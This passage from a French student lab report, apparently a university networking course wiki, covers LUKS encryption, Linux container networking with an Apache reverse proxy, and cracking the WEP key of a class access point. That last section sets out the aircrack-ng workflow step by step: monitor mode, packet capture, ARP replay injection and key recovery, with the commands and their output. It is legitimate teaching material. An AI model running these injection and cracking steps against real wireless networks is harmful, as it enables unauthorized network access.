 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1'''&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    '''mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt'''&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    '''umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    '''cryptsetup luksOpen /dev/sdb1 banane-crypt'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Crackage de clef WEP sur Point d'accès Wi-Fi&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On dispose de deux Zabeth munies chacune d'une clé Wi-Fi. Le point d'accès &amp;quot;banane&amp;quot; a été configuré par le groupe 3, qui a aussi installé les drivers pour ces clefs Wi-Fi&lt;br /&gt;
&lt;br /&gt;
On commence par établir la connexion au point d'accès Wifi banane sur une des Zabeth (la Zabeth17 en l'occurence). En lançant iwconfig, on voit que l'interface wlx000fb5922374 n'est pas active. Pour cela, on configure comme suit le fichier /etc/network/interfaces avec les paramètres de connexion du réseau banane.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# cat /etc/network/interfaces'''&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 source /etc/network/interfaces.d/*&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback &lt;br /&gt;
&lt;br /&gt;
 auto wlx000fb5922374&lt;br /&gt;
 iface wlx000fb5922374 inet static&lt;br /&gt;
  wireless-keymode open&lt;br /&gt;
  wireless-mode managed&lt;br /&gt;
  address 10.2.0.100&lt;br /&gt;
  netmask 255.255.0.0&lt;br /&gt;
  wireless-essid banane&lt;br /&gt;
  wireless-key 01234567891011121314151617&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WEP-1.png]]&lt;br /&gt;
&lt;br /&gt;
On redémarre ensuite les connexions réseau et on démarre l'interface wlx000fb5922374 pour établir la connexion sur banane. Et on vérifie avec iwconfig que la connexion est établie.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# service networking restart&lt;br /&gt;
 root@zabeth17:/home/pifou# ifdown wlx000fb5922374&lt;br /&gt;
 root@zabeth17:/home/pifou# ifup wlx000fb5922374'''&lt;br /&gt;
&lt;br /&gt;
[[Fichier:2.png]]&lt;br /&gt;
&lt;br /&gt;
Ensuite, on génère du trafic sur le réseau en envoyant 11000 paquets de type ARP vers 10.2.0.2 l'adresse du point d'accès.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth17:/home/pifou# nping --arp-type ARP -c 11000  --flags rst --ttl 2 10.2.0.2'''&lt;br /&gt;
&lt;br /&gt;
 Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2017-12-12 15:13 GMT&lt;br /&gt;
 SENT (0.0373s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (0.2238s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (1.0378s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (1.2438s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (2.0387s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (2.0638s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (3.0399s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (3.0839s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (4.0419s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 RCVD (4.1078s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
 SENT (5.0439s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WEP-5.png]]&lt;br /&gt;
&lt;br /&gt;
Nous mettons à présent la clef Wi-Fi de la deuxième Zabeth (Zabeth15) en mode moniteur pour écouter, et on vérifie que le nom de l'interface est devenu wlan0mon. &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airmon-ng start wlx000fb5922266'''&lt;br /&gt;
 &lt;br /&gt;
 Found 3 processes that could cause trouble.&lt;br /&gt;
 If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
 a short period of time, you may want to run 'airmon-ng check kill' &lt;br /&gt;
 &lt;br /&gt;
  PID Name&lt;br /&gt;
 1695 dhclient&lt;br /&gt;
 2949 avahi-daemon&lt;br /&gt;
 2950 avahi-daemon&lt;br /&gt;
 &lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
 phy0	wlx000fb5922266	p54usb		NetGear, Inc. WG111(v1) rev 2 54 Mbps Wireless [Intersil ISL3887]&lt;br /&gt;
 Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
 &lt;br /&gt;
	 	(mac80211 monitor mode vif enabled on [phy0]wlan0mon&lt;br /&gt;
	 	(mac80211 station mode vif disabled for [phy0]wlx000fb5922266)&lt;br /&gt;
 &lt;br /&gt;
Ensuite, on trouve le BSSID, CH (channel) et ESSID du réseau Wi-Fi à cracker (banane).&lt;br /&gt;
 &lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --encrypt wep wlan0mon'''&lt;br /&gt;
 &lt;br /&gt;
 CH  8 ][ Elapsed: 6 s ][ 2017-12-12 15:04                                         &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                        &lt;br /&gt;
 C4:14:3C:12:61:C2  -67       26        0    0   9  54e. WEP  WEP         BORNE_TEST3                   &lt;br /&gt;
 C4:14:3C:12:61:C1  -61       28        0    0   9  54e. WEP  WEP         BORNE_TEST2                   &lt;br /&gt;
 C4:14:3C:40:78:60  -70       21        0    0   3  54e. WEP  WEP         ananas                        &lt;br /&gt;
 C4:14:3C:40:78:63  -76       20        0    0   3  54e. WEP  WEP         goyave                         &lt;br /&gt;
 C4:14:3C:12:61:C4  -68       25        0    0   9  54e. WEP  WEP         BORNE_TEST5                   &lt;br /&gt;
 C4:14:3C:12:61:C0  -68       27        0    0   9  54e. WEP  WEP         BORNE_TEST1                   &lt;br /&gt;
 C4:14:3C:12:61:C3  -63       25        0    0   9  54e. WEP  WEP         BORNE_TEST4                   &lt;br /&gt;
 C4:14:3C:40:78:61  -73       16        0    0   3  54e. WEP  WEP         banane                        &lt;br /&gt;
 C4:14:3C:40:78:64  -68       14        0    0   3  54e. WEP  WEP         groseille                     &lt;br /&gt;
 C4:14:3C:40:78:65  -74       22        0    0   3  54e. WEP  WEP         reseau1                       &lt;br /&gt;
 C4:14:3C:12:61:C5  -59       24        0    0   9  54e. WEP  WEP         BORNE_TEST6                    &lt;br /&gt;
 C4:14:3C:40:78:62  -72       16        0    0   3  54e. WEP  WEP         durian                        &lt;br /&gt;
 C4:14:3C:40:78:67  -77       16        0    0   3  54e. WEP  WEP         tomate                        &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 (not associated)   AC:AF:B9:B0:DF:32  -75    0 - 1      0        1  PolytechLille                       &lt;br /&gt;
 (not associated)   B8:08:D7:16:6E:69  -73    0 - 1      0        1                                      &lt;br /&gt;
 (not associated)   60:F4:45:D0:DA:DB  -73    0 - 1      0        2  PolytechLille  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''pifou@zabeth15:~$ su'''&lt;br /&gt;
 Password: &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# iwconfig'''&lt;br /&gt;
 wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=17 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
           &lt;br /&gt;
 enp0s25   no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 enp6s0    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 lo        no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 docker0   no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vmnet1    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 bridge    no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vethcdea1bf  no wireless extensions.&lt;br /&gt;
 &lt;br /&gt;
 vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
On va maintenant surveiller le réseau et capturer les informations qui circulent.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon'''&lt;br /&gt;
&lt;br /&gt;
 # -c 3 précise que le réseau est sur le channel 3.&lt;br /&gt;
 # -w crack_wep_ungdelatte est le fichier qui va stocker les paquets capturés.&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 20 mins ][ 2017-12-12 15:18                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   8    11488        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En plus de airodump-ng, on génère encore plus de trafic sur le réseau pour éviter d'attendre très longtemps d'avoir assez de paquets.&lt;br /&gt;
&lt;br /&gt;
 '''aireplay-ng -3 -b C4:14:3C:40:78:61 -h 00:0F:B5:92:23:74 wlan0mon'''&lt;br /&gt;
 # -3 précise un ARP Request Replay Attack. &lt;br /&gt;
 # 00:0F:B5:92:23:74 étant l'adresse MAC de l'interface wlx000fb5922374 du premier ordinateur qui connecté sur le réseau. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour finir, on lance le crackage de la clef WEP à partir du fichier .cap créé.&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-01.cap'''&lt;br /&gt;
&lt;br /&gt;
 Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
 Read 12494 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
 Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
 Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
 Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon'''&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 28 mins ][ 2017-12-12 16:03                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   0    16423        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
                                                                   &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# ls'''&lt;br /&gt;
 3D				       Documents&lt;br /&gt;
 Arduino				       Downloads&lt;br /&gt;
 crack_wep_ungdelatte-01.cap	       GIS4_Bernard_Castelein&lt;br /&gt;
 crack_wep_ungdelatte-01.csv	       IMA5sc-ASR&lt;br /&gt;
 crack_wep_ungdelatte-01.kismet.csv     Music&lt;br /&gt;
 crack_wep_ungdelatte-01.kismet.netxml  Pictures&lt;br /&gt;
 crack_wep_ungdelatte-02.cap	       Public&lt;br /&gt;
 crack_wep_ungdelatte-02.csv	       R&lt;br /&gt;
 crack_wep_ungdelatte-02.kismet.csv     replay_arp-1212-153701.cap&lt;br /&gt;
 crack_wep_ungdelatte-02.kismet.netxml  Templates&lt;br /&gt;
 Desktop				       Videos&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 '''root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-02.cap'''&lt;br /&gt;
 Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
 Read 13001 packets.&lt;br /&gt;
  &lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
 Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
 Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
 Got no data packets from target network!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
Le crakage n'ayant pas fonctionné après deux fois, nous avons cherché notre erreur car les paquets récupérés par la Zabeth15 semblent vides, mais nous n'avons pas trouvé...&lt;br /&gt;
&lt;br /&gt;
--- &lt;br /&gt;
&lt;br /&gt;
Réussite en soutenance&lt;br /&gt;
&lt;br /&gt;
En lançant le crack après avoir écouté sur la bonne adresse MAC (terminant par 74), nous avons réussi à trouver la clef WEP, qui correspond bien à celle configurée.&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-03.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-03.cap&lt;br /&gt;
Read 211094 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    WEP (30765 IVs)&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-03.cap&lt;br /&gt;
Attack will be restarted every 5000 captured ivs.&lt;br /&gt;
Starting PTW attack with 30887 ivs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                 Aircrack-ng 1.2 rc4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:00] Tested 24537 keys (got 30676 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    4/  6   EE(37632) 01(37376) 95(37376) 20(36864) CD(36864) &lt;br /&gt;
    1    0/  1   23(43520) 7F(37376) 14(36352) 33(36352) 90(36352) &lt;br /&gt;
    2    0/  2   45(41472) 16(38656) E9(37376) C4(37120) 22(36352) &lt;br /&gt;
    3    0/  2   67(42240) B1(39168) 5B(36864) 15(36608) 0E(36352) &lt;br /&gt;
    4    0/  1   89(42496) 53(38912) 9F(38400) 9D(37888) E6(37888) &lt;br /&gt;
    5    0/  1   10(46080) ED(38656) A1(37888) F9(37888) 34(36608) &lt;br /&gt;
    6    1/  3   11(39680) 97(38144) BC(36352) 18(36096) 21(36096) &lt;br /&gt;
    7    1/  4   12(37632) 57(36608) EA(36352) A6(35840) E8(35840) &lt;br /&gt;
    8    7/ 20   13(36352) 49(36096) 5C(36096) 8D(36096) A3(35840) &lt;br /&gt;
    9    0/  1   14(42240) C7(38912) 30(36864) 47(36864) D5(36864) &lt;br /&gt;
   10    0/  1   15(44544) AF(39424) B6(38144) A9(37632) D8(37120) &lt;br /&gt;
   11    0/  1   16(43008) E7(38144) C2(37888) 07(36864) 16(36864) &lt;br /&gt;
   12    0/  5   17(39936) 1A(38400) 2B(38144) 60(37120) 71(36864) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ 01:23:45:67:89:10:11:12:13:14:15:16:17 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    '''unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh'''&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    '''nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash'''&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    '''ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4'''&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    '''ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour'''&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    '''ip l show et brctl show'''&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0'''&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1'''&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    '''ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0'''&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    '''ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up'''&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Le réseau étant fonctionnel nous pouvons nous attaquer à la configuration des serveur apache2.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc installé un serveur apache2 dans chaque conteneur.&lt;br /&gt;
&lt;br /&gt;
Pour ce qui est du serveur apache qui jouera le rôle de reverse proxy le fichier de configuration se trouvant dans /etc/apache2/sites-available sera configuré de la manière suivante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 ProxyPass / http://192.168.0.100:631&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:631&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On retrouve l'adresse du serveur apache qui correspond à celle du conteneur relié au réseau 192.48.57.189.&lt;br /&gt;
&lt;br /&gt;
On redirigera les requêtes via le port 631 (TCP/UDP) toutefois il est tout à fais possible de le faire circuler sur le port 80 car les serveurs se trouvent normalement dans des conteneurs.&lt;br /&gt;
&lt;br /&gt;
Au niveau de '''server1'''(équivalent pour server2) j'ai seulement cré un serveur apache2 sous cette forme:&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:631&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:631&amp;gt;&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il peut être nécessaire de demander dans ports.conf d'écouter le port 631.&lt;br /&gt;
&lt;br /&gt;
Dans le dns db.banane.space nous avons rajouter les différentes adresses:&lt;br /&gt;
&lt;br /&gt;
 reverse IN	A	193.48.57.189&lt;br /&gt;
 site1   IN	A	193.48.57.189&lt;br /&gt;
 site2	 IN	A	193.48.57.189&lt;br /&gt;
&lt;br /&gt;
Nous n'avons pas réussis à tester le fonctionnement car nous avons rencontré une erreur au niveau de la commande '''nsenter'''. en effet les conteneur ne sont pas isolés des processus extérieurs. Tous nos serveurs apaches ce sont donc installés or des '''unshare''' et forcément ne cohabitent donc pas très bien ensemble. Nous avons trouvé une piste qui serait en lien avec le /proc/self du système. la commande '''nsenter''' ne reconnaît pas les processus monté pas '''mount'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
J'ai créé un script test.conf se trouvant dans /pra.&lt;br /&gt;
&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
&lt;br /&gt;
 ip addr add 192.168.0.1/24 dev carrefour&lt;br /&gt;
 ip link set dev carrefour up&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;creation interface virtuelle&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
 ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
 ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
 ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;deplacement interface dans les ponts&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 ip link set vif1 master monpont&lt;br /&gt;
 ip link set vif2 master carrefour&lt;br /&gt;
 ip link set vif3 master carrefour&lt;br /&gt;
 ip link set vif4 master carrefour&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;creation conteneurs&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 unshare -n -u -m -p -f chroot /chroot /bin/config.sh &amp;amp;&lt;br /&gt;
 pid1=$!&lt;br /&gt;
 unshare -n -u -m -p -f chroot /server1 /bin/config.sh &amp;amp;&lt;br /&gt;
 pid2=$!&lt;br /&gt;
 unshare -n -u -m -p -f chroot /server2 /bin/config.sh &amp;amp;&lt;br /&gt;
 pid3=$!&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;deplacement interfaces dans les conteneurs&amp;quot;&lt;br /&gt;
 sleep 5&lt;br /&gt;
 ip link set eth0@vif1 netns /proc/$pid1/ns/net name eth0&lt;br /&gt;
 ip link set eth0@vif2 netns /proc/$pid1/ns/net name eth1&lt;br /&gt;
 ip link set eth0@vif3 netns /proc/$pid2/ns/net name eth0&lt;br /&gt;
 ip link set eth0@vif4 netns /proc/$pid3/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;ifup vif&amp;quot;&lt;br /&gt;
 sleep 5&lt;br /&gt;
 ip link set dev vif1 up&lt;br /&gt;
 ip link set dev vif2 up&lt;br /&gt;
 ip link set dev vif3 up&lt;br /&gt;
 ip link set dev vif4 up&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ce script permet de lancer l’ensemble des commande du dessus de façon à créer et configurer les conteneurs d'un seul coup.&lt;br /&gt;
tous le conteneur sont lancé grâce a la commande '''unshare''' avec la commande /bin/config.sh.&lt;br /&gt;
&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
&lt;br /&gt;
 ip link set dev lo up&lt;br /&gt;
 while true&lt;br /&gt;
 do&lt;br /&gt;
 sleep 1&lt;br /&gt;
 ip link show dev eth0 &amp;amp;&amp;amp; break&lt;br /&gt;
 done&lt;br /&gt;
 ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
&lt;br /&gt;
 while true&lt;br /&gt;
 do&lt;br /&gt;
 sleep 1&lt;br /&gt;
 ip link show dev eth1 &amp;amp;&amp;amp; break&lt;br /&gt;
 done&lt;br /&gt;
&lt;br /&gt;
 ip addr add 192.168.0.150/24 dev eth1&lt;br /&gt;
&lt;br /&gt;
 ip link set dev eth0 up&lt;br /&gt;
 ip link set dev eth1 up&lt;br /&gt;
 ip r add default via 193.48.57.177 dev eth0&lt;br /&gt;
&lt;br /&gt;
 sleep 10&lt;br /&gt;
 apache2ctl -DFOREGROUND&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque système de fichier des conteneur vous trouverez donc dans /bin un fichier config.sh qui permet de faire les configurations réseaux intra-conteneur et de lancer les serveurs apaches.&lt;br /&gt;
&lt;br /&gt;
Les serveurs apaches ne veulent plus se lancer à cause de l’erreur suivante:&lt;br /&gt;
&lt;br /&gt;
 httpd (pid 23) already running&lt;br /&gt;
 httpd (pid 11) already running&lt;br /&gt;
 httpd (pid 11) already running&lt;br /&gt;
&lt;br /&gt;
les conteneur sont donc détruits car les serveurs apaches qui doivent tourner en tache de fond ne se lance pas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
configuration des serveurs apaches:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
reverse proxy:&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
